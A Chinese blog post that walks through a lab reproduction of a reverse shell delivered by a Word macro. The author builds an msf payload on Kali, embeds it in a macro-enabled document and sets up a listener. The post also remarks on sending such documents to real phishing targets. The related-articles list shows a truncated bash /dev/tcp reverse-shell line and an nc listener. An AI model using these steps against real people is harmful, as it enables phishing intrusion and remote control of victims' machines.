美文网首页windows运维
word反弹shell复现

word反弹shell复现

作者: 草莓养殖户 | 来源:发表于2019-09-26 22:37 被阅读0次

0x01  参考网站

https://www.sohu.com/a/327077046_534345

https://www.cnblogs.com/diligenceday/p/7898839.html

0x02 准备环境

靶机:win 10

攻击机:kali 2.0

软件版本:office 2010 破解版

参考网址:http://m.sohu.com/a/327077046_534345

0x03 实验开始

0x03.0x01

查看kali 机 IP,并利用msf生成payload文件,名字为jaky.vba。vba不知道什么意思,呼唤度娘。看了也没看懂

查看IP 设置payload文件完成

0x03.0x02

将vba代码录入宏。宏又是什么东西,不管了,先继续做

进入信任中心,手动开启一下宏,默认是关闭的。

文件 -> 选项 -> 信任中心 -> 宏设置

设置宏内容:宏的名字可以任意命名,点击创建出现宏的编辑器。这是我创建的名字为“fk”的宏。

选中创建的宏,点击编辑,把jaky.vba的内容复制到宏里面。

将文档另存为包含宏的文档类型,如下图

保存并退出。然后通过你能想到的方式向靶机发送钓鱼文件。

0x03.0x03  攻击机设置

进入msf控制台,设置监听模式。

太晚了,都一点了,明天还得上班先睡觉。

今日:2019/9/27   接着昨天的做。设置好后,开始监听。。。。。

监听

0x03.0x04 钓鱼下钩

把构造好的文档发送给靶机。现实钓鱼的时候就通过你能想到的方法发送给攻击目标。

靶机上打开文档。

可惜,打开文档未成功反弹shell,但是payload还是管用的,直接运行宏可以反弹shell。但是现在的问题是文档打开的时候,payload不自动运行。或许以后会找到解决的办法的。在我找解决办法的时候,找到一个更加简单的利用word反弹shell的办法。

0x04 完结,实验成功

今天是2019/9/28


相关文章

  • word反弹shell复现

    0x01 参考网站 https://www.sohu.com/a/327077046_534345 https:/...

  • word反弹shell复现(msf生成木马文档)

    环境 靶机:win10 攻击机:kali 2.0 软件版本:word office 2010 破解版 64位 us...

  • 蚁剑 Electron XSS反弹shell复现

    一、环境 antsword2.0.5以前,antsword使用了Electron,Electron是由Github...

  • 【安全记录】反弹shell小记

    前言 本文记录反弹shell的一些注意事项,主要包括:常用反弹shell的payload,获得tty-shell,...

  • nc自启动

    例如开机自启cmd 自启nc反弹shell(一) 自启nc反弹shell(二)

  • kail工具介绍

    反弹Shell https://www.cnblogs.com/cocowool/p/reverse-shell....

  • 反弹shell

    Reverse Shell bash反弹服务端: bash -c 'sh -i &>/dev/tcp/210.28...

  • 反弹shell

    bash -i 操作 攻击机 192.168.188.140执行 nc -lvvp 8888监听本地8888端口 ...

  • Shell反弹

    背景 前段时间因为使用Flink默认配置,没有禁用通过web上传jar包提交作业的功能,同时服务器配有公网地址,也...

  • 反弹shell

    0X01 什么是反弹shell reverse shell,就是控制端监听在某TCP/UDP端口,被控端发起请求到...

网友评论

    本文标题:word反弹shell复现

    本文链接:https://www.haomeiwen.com/subject/lcwwuctx.html